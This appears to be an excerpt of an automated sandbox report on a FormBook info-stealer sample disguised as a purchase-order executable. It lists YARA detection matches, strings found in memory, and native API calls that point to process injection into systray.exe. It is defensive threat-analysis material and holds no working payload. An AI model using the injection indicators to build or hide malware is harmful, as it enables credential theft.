          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: PO-RFQ # 097663899.exeString found in binary or memory: https://www.gnu.org
          Source: PO-RFQ # 097663899.exeString found in binary or memory: https://www.gnu.org/licenses/
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.249957275.0000000001198000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.PO-RFQ # 097663899.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.PO-RFQ # 097663899.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.PO-RFQ # 097663899.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004181C0 NtCreateFile,4_2_004181C0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00418270 NtReadFile,4_2_00418270
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004182F0 NtClose,4_2_004182F0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004183A0 NtAllocateVirtualMemory,4_2_004183A0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004181BA NtCreateFile,4_2_004181BA
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041826A NtReadFile,4_2_0041826A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004182EA NtClose,4_2_004182EA
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041839A NtAllocateVirtualMemory,4_2_0041839A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE98F0 NtReadVirtualMemory,LdrInitializeThunk,4_2_00EE98F0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9860 NtQuerySystemInformation,LdrInitializeThunk,4_2_00EE9860
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9840 NtDelayExecution,LdrInitializeThunk,4_2_00EE9840
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE95D0 NtClose,LdrInitializeThunk,4_2_00EE95D0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE99A0 NtCreateSection,LdrInitializeThunk,4_2_00EE99A0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9540 NtReadFile,LdrInitializeThunk,4_2_00EE9540
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_00EE9910
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE96E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_00EE96E0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9660 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_00EE9660
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9A50 NtCreateFile,LdrInitializeThunk,4_2_00EE9A50
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9A20 NtResumeThread,LdrInitializeThunk,4_2_00EE9A20
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9A00 NtProtectVirtualMemory,LdrInitializeThunk,4_2_00EE9A00
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9FE0 NtCreateMutant,LdrInitializeThunk,4_2_00EE9FE0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE97A0 NtUnmapViewOfSection,LdrInitializeThunk,4_2_00EE97A0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9780 NtMapViewOfSection,LdrInitializeThunk,4_2_00EE9780
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9710 NtQueryInformationToken,LdrInitializeThunk,4_2_00EE9710
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE98A0 NtWriteVirtualMemory,4_2_00EE98A0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EEB040 NtSuspendThread,4_2_00EEB040
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9820 NtEnumerateKey,4_2_00EE9820
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE95F0 NtQueryInformationFile,4_2_00EE95F0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE99D0 NtCreateProcessEx,4_2_00EE99D0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9560 NtWriteFile,4_2_00EE9560
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9950 NtQueueApcThread,4_2_00EE9950
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9520 NtWaitForSingleObject,4_2_00EE9520
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EEAD30 NtSetContextThread,4_2_00EEAD30
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE96D0 NtCreateKey,4_2_00EE96D0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9A80 NtOpenDirectoryObject,4_2_00EE9A80
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9670 NtQueryInformationProcess,4_2_00EE9670
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9650 NtQueryValueKey,4_2_00EE9650
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9610 NtEnumerateValueKey,4_2_00EE9610
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9A10 NtQuerySection,4_2_00EE9A10
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EEA3B0 NtGetContextThread,4_2_00EEA3B0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9760 NtOpenProcess,4_2_00EE9760
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9770 NtSetInformationFile,4_2_00EE9770
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EEA770 NtOpenThread,4_2_00EEA770
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9730 NtQueryVirtualMemory,4_2_00EE9730
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE9B00 NtSetValueKey,4_2_00EE9B00
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EEA710 NtOpenProcessToken,4_2_00EEA710
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9540 NtReadFile,LdrInitializeThunk,14_2_050B9540
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B95D0 NtClose,LdrInitializeThunk,14_2_050B95D0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9710 NtQueryInformationToken,LdrInitializeThunk,14_2_050B9710
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9780 NtMapViewOfSection,LdrInitializeThunk,14_2_050B9780
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9FE0 NtCreateMutant,LdrInitializeThunk,14_2_050B9FE0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9650 NtQueryValueKey,LdrInitializeThunk,14_2_050B9650
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9660 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_050B9660
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B96D0 NtCreateKey,LdrInitializeThunk,14_2_050B96D0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B96E0 NtFreeVirtualMemory,LdrInitializeThunk,14_2_050B96E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_050B9910
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B99A0 NtCreateSection,LdrInitializeThunk,14_2_050B99A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9840 NtDelayExecution,LdrInitializeThunk,14_2_050B9840
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9860 NtQuerySystemInformation,LdrInitializeThunk,14_2_050B9860
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9A50 NtCreateFile,LdrInitializeThunk,14_2_050B9A50
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9520 NtWaitForSingleObject,14_2_050B9520
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050BAD30 NtSetContextThread,14_2_050BAD30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9560 NtWriteFile,14_2_050B9560
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B95F0 NtQueryInformationFile,14_2_050B95F0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050BA710 NtOpenProcessToken,14_2_050BA710
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9730 NtQueryVirtualMemory,14_2_050B9730
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9760 NtOpenProcess,14_2_050B9760
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050BA770 NtOpenThread,14_2_050BA770
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9770 NtSetInformationFile,14_2_050B9770
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B97A0 NtUnmapViewOfSection,14_2_050B97A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9610 NtEnumerateValueKey,14_2_050B9610
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9670 NtQueryInformationProcess,14_2_050B9670
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9950 NtQueueApcThread,14_2_050B9950
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B99D0 NtCreateProcessEx,14_2_050B99D0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9820 NtEnumerateKey,14_2_050B9820
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050BB040 NtSuspendThread,14_2_050BB040
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B98A0 NtWriteVirtualMemory,14_2_050B98A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B98F0 NtReadVirtualMemory,14_2_050B98F0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9B00 NtSetValueKey,14_2_050B9B00
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050BA3B0 NtGetContextThread,14_2_050BA3B0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9A00 NtProtectVirtualMemory,14_2_050B9A00
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9A10 NtQuerySection,14_2_050B9A10
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9A20 NtResumeThread,14_2_050B9A20
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9A80 NtOpenDirectoryObject,14_2_050B9A80
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E83A0 NtAllocateVirtualMemory,14_2_030E83A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E8270 NtReadFile,14_2_030E8270
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E82F0 NtClose,14_2_030E82F0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E81C0 NtCreateFile,14_2_030E81C0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E839A NtAllocateVirtualMemory,14_2_030E839A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E826A NtReadFile,14_2_030E826A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E82EA NtClose,14_2_030E82EA
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E81BA NtCreateFile,14_2_030E81BA
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 0_2_013E94A80_2_013E94A8
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 0_2_013EDB4C0_2_013EDB4C
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 0_2_013EC1480_2_013EC148
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 0_2_013EE2110_2_013EE211
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 0_2_013EA7580_2_013EA758
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041C07D4_2_0041C07D
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004010304_2_00401030
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041B8C54_2_0041B8C5
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0040117B4_2_0040117B
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041C1DC4_2_0041C1DC
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041BAF24_2_0041BAF2
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041C3884_2_0041C388
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00408C5E4_2_00408C5E
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00408C604_2_00408C60
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041B4994_2_0041B499
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041B4A64_2_0041B4A6
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00402D874_2_00402D87
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00402D904_2_00402D90
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041C5A84_2_0041C5A8
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041BE7E4_2_0041BE7E
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041BE124_2_0041BE12
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041CE304_2_0041CE30
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041BF6A4_2_0041BF6A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00402FB04_2_00402FB0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED20A04_2_00ED20A0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F720A84_2_00F720A8
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBB0904_2_00EBB090
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F610024_2_00F61002
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB841F4_2_00EB841F
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBD5E04_2_00EBD5E0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED25814_2_00ED2581
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F71D554_2_00F71D55
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA0D204_2_00EA0D20
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EC41204_2_00EC4120
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAF9004_2_00EAF900
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F72D074_2_00F72D07
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F72EF74_2_00F72EF7
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F722AE4_2_00F722AE
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EC6E304_2_00EC6E30
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F71FF14_2_00F71FF1
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDEBB04_2_00EDEBB0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F72B284_2_00F72B28
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05142D0714_2_05142D07
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05070D2014_2_05070D20
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05141D5514_2_05141D55
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A258114_2_050A2581
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_051425DD14_2_051425DD
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508D5E014_2_0508D5E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508841F14_2_0508841F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513D46614_2_0513D466
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05141FF114_2_05141FF1
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513D61614_2_0513D616
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05096E3014_2_05096E30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05142EF714_2_05142EF7
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507F90014_2_0507F900
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509412014_2_05094120
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513100214_2_05131002
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508B09014_2_0508B090
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A20A014_2_050A20A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_051420A814_2_051420A8
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_051428EC14_2_051428EC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05142B2814_2_05142B28
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AEBB014_2_050AEBB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513DBD214_2_0513DBD2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_051422AE14_2_051422AE
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030EB8C514_2_030EB8C5
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030D2FB014_2_030D2FB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030ECE3114_2_030ECE31
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030D2D8714_2_030D2D87
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030D2D9014_2_030D2D90
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030EC5A814_2_030EC5A8
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030D8C5E14_2_030D8C5E
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030D8C6014_2_030D8C60
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030EB49914_2_030EB499
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030EB4A614_2_030EB4A6
          Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 0507B150 appears 35 times
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: String function: 00EAB150 appears 35 times
          Source: PO-RFQ # 097663899.exeBinary or memory string: OriginalFilename vs PO-RFQ # 097663899.exe
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.260803980.0000000007560000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll" vs PO-RFQ # 097663899.exe
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251630889.000000000307C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll2 vs PO-RFQ # 097663899.exe
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.249957275.0000000001198000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO-RFQ # 097663899.exe
          Source: PO-RFQ # 097663899.exeBinary or memory string: OriginalFilename vs PO-RFQ # 097663899.exe
          Source: PO-RFQ # 097663899.exe, 00000004.00000002.295144212.0000000000BE8000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamesystray.exej% vs PO-RFQ # 097663899.exe
          Source: PO-RFQ # 097663899.exe, 00000004.00000002.295297599.0000000000F9F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO-RFQ # 097663899.exe
          Source: PO-RFQ # 097663899.exeBinary or memory string: OriginalFilenameUrl.exeB vs PO-RFQ # 097663899.exe
          Source: PO-RFQ # 097663899.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
